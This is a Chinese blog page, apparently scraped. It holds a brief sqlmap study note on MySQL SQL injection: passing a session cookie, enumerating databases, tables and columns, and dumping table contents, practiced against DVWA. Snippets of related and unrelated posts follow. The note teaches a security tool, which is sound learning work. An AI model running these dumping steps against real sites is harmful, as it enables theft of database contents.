sqlmap获取mysql数据库,SQLMAP学习笔记2 Mysql数据库注入

SQLMAP学习笔记2 Mysql数据库注入

注入流程

(如果网站需要登录，就要用到cookie信息，通过F12开发者工具获取cookie信息)

sqlmap -u "URL" --cookie="名称=值; 名称=值" --batch   #其中-u参数指定目标URL，--batch参数采用默认选项、不进行询问。

结果发现是可注入的

1、sqlmap -u "url" --dbs # 获取数据库；

2、sqlmap -u "url"  -D 指定的数据库  --tables --batch  #通过-D参数指定为dvwa数据库，--tables参数查看所有的表；

3、sqlmap -u "url" -D 指定的数据库 -T 指定的表 --columns # 通过-T参数指定表为users，--columns查看该表的所有列；

4、sqlmap -u "url" -D 指定的数据库 -T 指定的表 --dump # 直接用--dump参数将所有列的信息都列出来；

see you

[Python] 学习笔记之MySQL数据库操作

1 Python标准数据库接口DB-API介绍 Python标准数据库接口为 Python DB-API,它为开发人员提供了数据库应用编程接口.Python DB-API支持很多种的数据库,你可以选择 ...

Python 2.7 学习笔记 访问mysql数据库

一.基本概念 使用python操作数据库,其基本的流程如下(其实所有开发语言访问数据库的流程都是这样). 1.第一,引入相应数据库的python数据库接口模块,针对不同的数据库类型,有不同的数据库访问 ...

mysql学习笔记之mysql数据库的安装

1.执行mysql安装包选择自己定义安装(安装路径不要带中文,否则安装会出错! ) 2.一个mysql想要操作成功须要有三部分:server端,数据段,数据. 3.server软件文件夹: 4.数据文 ...

2.羽翼sqlmap学习笔记之MySQL注入

1.判断一个url是否存在注入点: .sqlmap.py -u "http://abcd****efg.asp?id=7" -dbs 假设找到数据库:student ------- ...

学习笔记：MySQL数据库初步 概念

数据库 什么是数据库,数据库就是对大量信息进行管理的高效的解决方案,按照数据结构来组织.存储和管理数据的载体.而我们常说的数据库可以分为关系型和非关系型数据库. 关系型数据库 这里说的关系型数据库,是 ...

PHP学习笔记：MySQL数据库的操纵

Update语句 Update 表名 set 字段1=值1, 字段2=值2  where  条件 练习: 把用户名带  ‘小’的人的密码设置为123456@ 语句:UPDATE crm_user SE ...

SQLMAP学习笔记1 access注入

SQLMAP学习笔记1  access注入 Sqlmap是开源的自动化SQL注入工具,由Python写成,具有如下特点: 完全支持MySQL.Oracle.PostgreSQL.Microsoft S ...

ref:学习笔记 UpdateXml() MYSQL显错注入

ref:https://www.cnblogs.com/MiWhite/p/6228491.html 学习笔记 UpdateXml() MYSQL显错注入 在学习之前,需要先了解 UpdateXml( ...

(1.3)学习笔记之mysql体系结构(C/S整体架构、内存结构、物理存储结构、逻辑结构)

目录 1.学习笔记之mysql体系结构(C/S架构) 2.mysql整体架构 3.存储引擎 4.sql语句处理--SQL层(内存层) 5.服务器内存结构 6.mysql如何使用磁盘空间 7.mysql ...

随机推荐

Codeforces Round #313 (Div. 2) C. Gerald's Hexagon

C. Gerald's Hexagon time limit per test 2 seconds memory limit per test 256 megabytes input standard ...

C#使用文件监控对象FileSystemWatcher 实现数据同步

在C#使用文件监控对象FileSystemWatcher 实现数据同步 2013-12-12 18:24 by 幕三少, 352 阅读, 3 评论, 收藏, 编辑 最近在项目中有这么个需求,就是得去实 ...

PAT乙级1004. 成绩排名 (20)

读入n名学生的姓名.学号.成绩,分别输出成绩最高和成绩最低学生的姓名和学号. 输入格式:每个测试输入包含1个测试用例,格式为 第1行:正整数n 第2行:第1个学生的姓名 学号 成绩 第3行:第2个学生 ...

word20161227客厅家电

1.Applicances 厨房.清洁用家电 2.Electronics 电视.音箱类家电 3.White goods 七八十年代家电基本都是白色的,所以流行叫白色家电,至今沿用 4.sleek an ...

Python004-数据处理示例：以某个数据(字段)为基准从数据中获取不同的字段行数

数据源样式如下所示: 需求: 读取文本,以第一列为基准参考系,每个基准仅输出满足需要条数的数据:不满足,全部输出. 比如,基准为 6236683970000018780,输出条数要求为 5.若文本中含 ...

B. Interesting drink

链接 [http://codeforces.com/group/1EzrFFyOc0/contest/706/problem/B] 题意 给你n个数,q次查询,每次输入一个m,问n个数中有多少个数小于 ...

集合 enum 枚举 简介 案例 MD

Markdown版本笔记 我的GitHub首页 我的博客 我的微信 我的邮箱 MyAndroidBlogs baiqiantao baiqiantao bqt20094 baiqiantao@sina ...

centos7 tomcat9

1.下载 下载 apache-tomcat-9.0.0.M4.tar.gz 文件:  wget http://mirror.bit.edu.cn/apache/tomcat/tomcat-9/v9.0 ...

iOS-字符串拼接

// // main.m // /* 将两个字符串 NSString * str1 = @"123"; NSString * str2 = @"abc"; 拼接 ...

jQuery源码浅析

这几天看了下jQuery源码,有些收获,解答了我以前对jQuery的疑问,现在我把收获分享给大家. 一.jQuery为何弄成自执行函数,以及为何在引用了jquery文件之后,可以通过$或jQuery来 ...